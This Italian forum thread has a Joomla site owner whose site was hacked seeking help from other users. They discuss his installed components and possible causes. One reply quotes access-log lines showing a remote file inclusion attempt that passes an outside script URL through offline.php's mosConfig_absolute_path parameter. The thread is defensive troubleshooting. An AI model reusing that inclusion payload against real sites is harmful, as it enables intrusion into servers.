AIUTO sito HACKERATO

[Druido]

Salve a tutti sono leggermente disperato 

Il mio sito ospitato su joomlahost stamattina non andava e dopo aver contattato l'assistenza ho scoperto che è stato ackerato.
La stessa assistenza di joomlahost mi ha suggerito di fare quanto segue:

1- scaricare in locale i contenuti del sito web
2- cancellare lo spazio occupato in httpdocs
3- richiedere la riattivazione del dominio
4- una volta identificato il problema in locale risolverlo e uplodare nuovamente i contenuti.

Ma io come faccio ha identificare il problema? mi hanno detto che potrebbe essere dovuto a qualche componente non sicuro ma a memoria mi ricordo di aver installato solo joomfish, virtuemart, zoommediagallery e extcalendar.

Qualche consiglio?
Grazie.

[cos]

Guarda qua

http://help.joomla.org/component/option,com_easyfaq/task,view/id,186/Itemid,268/


se trovi  il componenete incriminato

in ogni caso insisti con jh  loro   sanno piu di te  qualè puo essere il componenete incrininato

che te lo dicano.

[Druido]

Sto scaricando tutto il sito in locale per poi montarlo su wamp così controllo bene che componenti avevo.
Intanto grazie

[cos]

ok

facci sapere  cosa era

in ogni caso lo trovo assurdo che tu debba  scaricarti tutto e poi riuplodare


 

[Druido]

ho appena chiesto all'host anche perchè mi hanno bloccato l'accesso a phpmyadmin e non posso fare il recupero del database.

comunque ho riflettuto su e sono certo che la versione di joomla era l'ultima disponibile ed i componenti installati erano solo questi:

joomfish
virtuemart
extcalendar 0.9.2
zoommediagallery 2.5.1 stable
joomlaexplorer

[Druido]

Nulla mi hanno appena risposto che non spetta a loro l'analisi di quanto successo ma solo a me, mi hanno anche detto che devo eliminare tutto il contenuto sul sito se no non mi riattivano l'host. Una volta fatto potrò scaricarmi da me il log speriamo di non dover buttare via l'intero sito.

[cos]

BEL Trattamento!!!
 
a meno che non usi vm 1.010

gli altri non sembrano nella lista nera

[Luca Curatola]

Nulla mi hanno appena risposto che non spetta a loro l'analisi di quanto successo ma solo a me, mi hanno anche detto che devo eliminare tutto il contenuto sul sito se no non mi riattivano l'host. Una volta fatto potrò scaricarmi da me il log speriamo di non dover buttare via l'intero sito.

Hai in mano i log del webserver?

[Druido]

Messo tutto in locale e mi sembra funzionare benissimo, non so dove andare a cercare eventuali tracce si hacker
allego i due log di questa notte sperando che qualcuno di voi mi sappia aiutare.
Grazie.

log:
http://www.miniplane.net/Downloads.rar

[Luca Curatola]

A che ora è avvenuto il fattaccio?

[Luca Curatola]

Codice: [Seleziona]

access_log.processed:218.145.56.3 - - [23/Jan/2008:11:20:02 +0100] "GET //offline.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt? HTTP/1.1" 200 317 "-" "libwww-perl/5.79"
access_log.processed:218.145.56.3 - - [23/Jan/2008:11:20:02 +0100] "GET //offline.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt? HTTP/1.1" 200 317 "-" "libwww-perl/5.79"
Qua il server non ha restituito pagine di errore.

[Druido]

Grazie Luca ma sono un'isperto
non so cosa voglia dire che non ha restituito pagine di errore.

Comunque ho appena finito di controllare in locale le versione installate, eccole:

Joomla 1.0.13 stable

Virtuemart 1.0.13 a
Zoom media gallery 2.5.1. rc4
ExtCal Settings 0.9.2 rc4
Joomfish 1.8.2
sh404SEF 1.3 rc

Allego lo screen dei componenti



[allegato eliminato da un amministratore]

[cos]

sarei curioso di sapere qual'è il componente incriminato!!!

dalla  lista conosciuta non c'è ne nessuno di quelli elencati

hai fatto un giro sui siti degli sviluppatori  magari c'è qualcosa di nuovo???

[..-. ..-]

Ho avvisato il Dev Team, fortunatamente non è a causa del codice segnalato da Luca nello stralcio del file log.
Fortunatamanete offline.php è risultato sicuro a quel tipo di attacco.

[cos]

prima di tutto chi ti cancella   i nr di post sei tornato a 1 msg    a mente ne dovresti avere forse  4000/5000 


poi se ci rendi dotti !!

grazie

[..-. ..-]

sono io che li resetto odio le alte quote.
Comunque o ricevuto ulteriore conferma adesso che non è quella la causa. quindi bisogna cercare altrove.

[cos]

solito discorso

loro lo sanno  e non lo dicono   mah!!

[..-. ..-]

In questo, come in altri casi, sarebbe molto utile conoscere il tipo di attacco, se semplice defacement,  attacco sql o altro. Non si chiede la componente ma il tipo di danno arrecato che sarebbe utile sapere per cercare la causa.

[Druido]

non so che dire, io sto guardando il sito in locale e non trovo nulla ma le mie conoscenze sono limitatissime... Vorrei scoprire qualcosa in più ma l'host mi ha detto che non è loro competenza, se mi sapete indicare come fare... volentieri.

[cos]

si
pubblicare, dire, informare, enunciare,esprimere,   pronunciare,   
formulare,   articolare,   manifestare,   esternare
dichiarare,  presentare,   esporre,   riferire
formulare, illustrare mettere in giro la voce,  strombazzare
rendere noto,   fare sapere,   comunicare,   rivelare,   manifestare,   informare,   proclamare,   dichiarare,   segnalare,   riferire,   notificare,   diffondere,   divulgare,   diramare


su tutti i forum che conosci

se hai bisogno di link  chiedi pure